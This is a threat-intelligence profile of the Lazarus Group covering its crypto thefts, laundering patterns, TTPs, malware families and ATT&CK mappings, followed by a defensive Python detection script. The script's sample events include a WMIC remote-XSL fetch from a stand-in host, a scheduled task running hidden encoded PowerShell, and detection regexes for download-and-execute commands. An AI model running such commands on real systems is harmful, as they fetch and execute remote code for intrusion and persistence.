Threat Actor Profile: Lazarus Group 

Lazarus Group is a North Korean state-sponsored cyber threat actor and one of the most prolific cybercrime syndicates operating globally. In 2026, the group has evolved well beyond traditional espionage into a dominant force in financially motivated cyber operations — now augmented by artificial intelligence (AI) and sophisticated cryptocurrency laundering infrastructure.

During the first half of 2026, Lazarus intensified its focus on decentralized finance (DeFi) platforms and Web3 ecosystems across the Asia-Pacific (APAC) region. The group’s AI-assisted spearphishing campaigns, expanded supply chain trojanization efforts, and novel laundering networks routed through APAC exchanges represent a materially elevated threat profile for the region.


Numerous cybersecurity vendors and government agencies track the threat actor under a wide range of aliases, including APT-C-26, Appleworm, Diamond Sleet, Guardians of Peace, Hidden Cobra, Labyrinth Chollima, Slow Pisces, TA404, UNC2970, UNC4034, Zinc, and several others.

Origin and Target Regions 

[Figure: Cyble Vision Threat Library (Source: Cyble Vision)]

Attributed to North Korea (DPRK), Lazarus Group’s operations have targeted countries worldwide, including Australia, Brazil, Canada, China, Germany, India, Japan, South Korea, the United States, the United Kingdom, and many more across Asia, Europe, and the Americas. The group focuses on high-value sectors including aerospace and defense, banking and financial services, cryptocurrency exchanges and DeFi platforms, education, energy and utilities, government, healthcare, media, technology, and transportation and logistics.

2026 Evolution

The use of generative AI tools by Lazarus-affiliated actors is now documented, not speculated. According to online reports, an investigation into the HexagonalRodent subgroup found that attackers used tools including ChatGPT and Cursor to write malware code, build fake company websites, and create entirely fictional leadership teams to lend credibility to fraudulent recruitment fronts. In just the first three months of 2026, the same subgroup exfiltrated 26,584 cryptocurrency wallets from 2,726 infected developer systems, exposing the public keys of wallets holding up to $12 million in crypto assets.

Security researchers had also flagged AI-enabled deepfakes and more precise spearphishing as expected near-term escalations in Lazarus methodology, a prediction since borne out by the Zerion incident in April 2026, in which AI-enabled social engineering was used to gain access to team members’ sessions, credentials, and private keys.

Major 2025–2026 Cryptocurrency Theft Operations

The scale of Lazarus Group’s financial operations has reached levels that reshape how the crypto sector models threat exposure:

Bybit (February 2025): The largest cryptocurrency theft ever recorded. Lazarus stole approximately $1.46–1.5 billion in Ethereum from Dubai-based exchange Bybit by compromising Safe{Wallet}, a widely used multi-signature wallet platform, and manipulating the transaction approval process so Bybit signers unknowingly authorised a malicious transfer. The FBI officially attributed the attack to Lazarus on February 26, 2025. Laundering began within hours: stolen ETH was converted to Bitcoin and other assets via THORChain and dispersed across thousands of addresses. At least $160 million was laundered within the first 48 hours.

KelpDAO (April 2026): Attributed to TraderTraitor (a Lazarus sub-unit), the KelpDAO exploit drained approximately $292 million via a compromised rsETH bridge on LayerZero. Proceeds again moved through THORChain before going dormant.

Cryptocurrency Laundering Methods

Following the Bybit hack, blockchain analytics firms Nansen and Chainalysis documented Lazarus’s laundering methodology in detail. The process involves converting illiquid staked tokens into liquid assets (primarily ETH and BTC), routing funds through decentralised exchanges, cross-chain bridges, and no-KYC instant swap services, and breaking transactions repeatedly across intermediate wallets to complicate tracing. THORChain has emerged as a consistently used exit ramp — assets enter as ETH and emerge as BTC. The group also lets certain wallets sit dormant for extended periods to allow investigative scrutiny to subside before moving funds.

How Cyble Hawk Supports Detection


Identifying Lazarus activity before it reaches its target requires visibility into the dark web and underground forums where pre-operational infrastructure is staged and credentials are traded. Cyble’s dark web monitoring capability provides continuous coverage of these channels — including newly registered C2 infrastructure, credential marketplaces where APAC exchange and financial institution logins are sold, and early malware samples shared in closed communities before broad deployment.

Operational Overview 

Lazarus Group’s operations span a wide range of techniques, from spearphishing with malicious attachments to drive-by compromise of legitimate websites. During Operation Dream Job, Lazarus deployed fake job offers via LinkedIn and other platforms, tricking targets into opening malicious Microsoft Word documents or clicking malicious links. The 2026 evolution of these operations is characterised by greater AI-assisted personalisation of lures and tighter integration between initial access and financial exfiltration objectives.

Tactics, Techniques, and Procedures (TTPs) 

Lazarus Group gains initial access through several methods. It delivers malware through compromised legitimate websites, tricking visitors into downloading malicious software without realising it. It sends carefully crafted spearphishing emails with harmful attachments or links aimed at specific individuals, and it uses social media platforms such as LinkedIn to send targeted phishing messages that entice victims to click on malicious content.

Once inside a system, the group uses a range of techniques to execute malicious code and move laterally within the network. It leverages built-in system tools to run commands and automate tasks that help maintain its presence, and it often embeds malicious macros in documents so that code executes when the file is opened.

The group exploits native system functions to gather information and communicate covertly with its command-and-control servers. It also takes advantage of software vulnerabilities, such as those in Adobe Flash, to execute harmful code, and uses deceptive files and links to lure victims into running malware.

To stay hidden and maintain long-term access, Lazarus Group uses legitimate credentials to reach restricted parts of the network. It also manipulates account settings, such as renaming administrator accounts, to avoid detection and continue operating without interruption.

Malware Arsenal

[Figure: Malware Families Used by the Lazarus Group (Source: Cyble Vision)]

Lazarus Group utilizes a vast collection of malware families, including but not limited to: 

  • Backdoors: DarkComet, Gh0st RAT, Andaratm, ARTULFPIE, BADCALL, Dtrack
  • Credential Stealers: Mimikatz, ProcDump, Castov
  • Loaders & Downloaders: XORIndex, Agamemnon, BlindToad, Hotwax, PowerSpritz, OtterCookie, DPAPILoader, RemotePELoader
  • Wipers: Destover, CleanToad, KillDisk, Junk, BootWreck
  • Tunneling Tools: 3proxy, Stunnel, ClientTrafficForwarder
  • Ransomware: Hermes
  • macOS: Mach-O Man kit (Go-compiled Mach-O binaries; macrasv2 stealer module), RemotePE (fileless RAM-resident RAT)

Conclusion 

Lazarus Group is not a static threat. The group’s 2025–2026 operations — including the $1.5 billion Bybit heist, the KelpDAO and Drift exploits, AI-assisted developer targeting, and the Mach-O Man macOS campaign — demonstrate a threat actor continuously expanding both its technical capability and its target surface. According to TRM Labs, cumulative attributed theft now exceeds $6 billion since 2017, with North Korean actors responsible for 76% of all global crypto hack losses in the first four months of 2026 alone.

For security teams, the implication is clear: Lazarus operates with state resources, strategic patience, and an increasingly diverse toolkit. Defensive postures built around any single attack vector are insufficient.


Mitigations and Recommendations  

  • Improve Email Security: Use strong email filters to block phishing emails, and train staff to recognise suspicious messages.
  • Keep Software Updated: Apply patches and updates quickly, and fix vulnerabilities in software such as Adobe Flash.
  • Use Multi-Factor Authentication: Add MFA to all accounts, especially administrative ones, so that a stolen password alone is not enough to log in.
  • Limit Macros and Scripts: Turn off macros unless they are needed, and monitor PowerShell and other scripting activity for unusual behaviour.
  • Manage Credentials Carefully: Change passwords regularly, remove unused accounts, and watch for changes such as renamed administrator accounts.

MITRE Attack Techniques Associated with the Lazarus Group 

[Figure: MITRE ATT&CK techniques (Source: Cyble Vision)]

  • Drive-by Compromise (T1189): Delivered RATANKBA and other malware via compromised legitimate websites. 
  • Spearphishing Attachment (T1566.001): Sent spearphishing emails with malicious Word documents, as seen in Operation Dream Job, using malicious attachments to gain access. 
  • Spearphishing Link (T1566.002): Sent malicious email links, such as Operation Dream Job’s fake OneDrive job offer links. 
  • Spearphishing via Service (T1566.003): Used social media platforms like LinkedIn and Twitter to send phishing messages, exemplified by Operation Dream Job’s fake job offers on LinkedIn. 
  • Windows Management Instrumentation (T1047): Used WMIC for discovery and payload execution, as in Operation Dream Job’s remote XSL script execution. 
  • Scheduled Task (T1053.005): Used scheduled tasks for persistence by creating tasks to periodically execute remote scripts or payloads. 
  • PowerShell (T1059.001): Executed commands and malicious code via PowerShell, such as exploring victim environments during Operation Dream Job. 
  • Windows Command Shell (T1059.003): Used cmd.exe to run commands and manage the malware lifecycle, including launching DLL files and creating or renaming folders. 
  • Exploitation for Client Execution (T1203): Exploited software vulnerabilities like Adobe Flash CVE-2018-4878 to run code. 
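The TTP descriptions above and the ATT&CK list (WMIC remote XSL execution, scheduled tasks launching scripts, PowerShell execution, and renamed administrator accounts) translate into a small set of host-telemetry detections. The following is an added example, not code from the page or from Cyble: it runs rule-based checks over constructed Windows event records (4688 process creation and 4781 account-name change) whose field names, paths and values are assumed for illustration.

```python
import re

# Constructed sample telemetry (not from the page or any real incident). Each record
# is a simplified Windows event: 4688 = process creation, 4781 = account renamed.
SAMPLE_EVENTS = [
    {"record": 1, "event_id": 4688, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": 'wmic os get /format:"https://example.invalid/dreamjob.xsl"'},
    {"record": 2, "event_id": 4688, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks /create /sc minute /mo 30 /tn Updater /tr "powershell -w hidden -enc SQBFAFgA"'},
    {"record": 3, "event_id": 4688, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -EncodedCommand SQBFAFgA"},
    {"record": 4, "event_id": 4688, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic logicaldisk get caption,size"},
    {"record": 5, "event_id": 4781, "OldTargetUserName": "Administrator", "NewTargetUserName": "svc_backup"},
    {"record": 6, "event_id": 4781, "OldTargetUserName": "jdoe", "NewTargetUserName": "jdoe2"},
]

# (technique label, process images the rule applies to, command-line pattern)
RULES = [
    ("T1047 WMIC remote XSL execution", ("wmic.exe",),
     re.compile(r'/format:\s*"?https?://', re.I)),
    ("T1053.005 scheduled task launching a script host or URL", ("schtasks.exe",),
     re.compile(r'/create\b.*/tr\b.*(powershell|pwsh|mshta|wscript|cscript|https?://)', re.I)),
    ("T1059.001 PowerShell encoded or download command", ("powershell.exe", "pwsh.exe"),
     re.compile(r'-e(nc|ncodedcommand)?\b|downloadstring|\biex\b', re.I)),
]
PRIVILEGED_NAMES = {"administrator", "admin"}


def detect(events):
    """Return (record, finding) pairs for events that match the rules above."""
    hits = []
    for ev in events:
        if ev.get("event_id") == 4781:
            # Renaming a built-in admin account is the evasion the profile describes.
            if ev.get("OldTargetUserName", "").lower() in PRIVILEGED_NAMES:
                hits.append((ev["record"], "privileged account renamed to %s" % ev.get("NewTargetUserName")))
            continue
        image = ev.get("image", "").rsplit("\\", 1)[-1].lower()
        for label, images, pattern in RULES:
            if image in images and pattern.search(ev.get("cmdline", "")):
                hits.append((ev["record"], label))
    return hits


if __name__ == "__main__":
    for record, finding in detect(SAMPLE_EVENTS):
        print(f"record {record}: {finding}")
```

Records 1, 2, 3 and 5 are flagged; the benign WMIC disk query and the rename of an ordinary user are not.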